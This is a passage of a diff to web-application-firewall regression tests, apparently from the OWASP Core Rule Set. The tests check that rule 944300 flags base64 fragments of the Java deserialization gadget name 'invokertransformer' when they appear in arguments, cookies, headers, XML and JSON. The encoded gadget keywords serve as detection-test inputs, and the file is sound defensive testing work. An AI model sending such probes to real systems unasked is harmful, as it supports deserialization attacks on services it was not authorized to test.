version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 210 desc: "Argument 
test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 221 desc: 
"Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
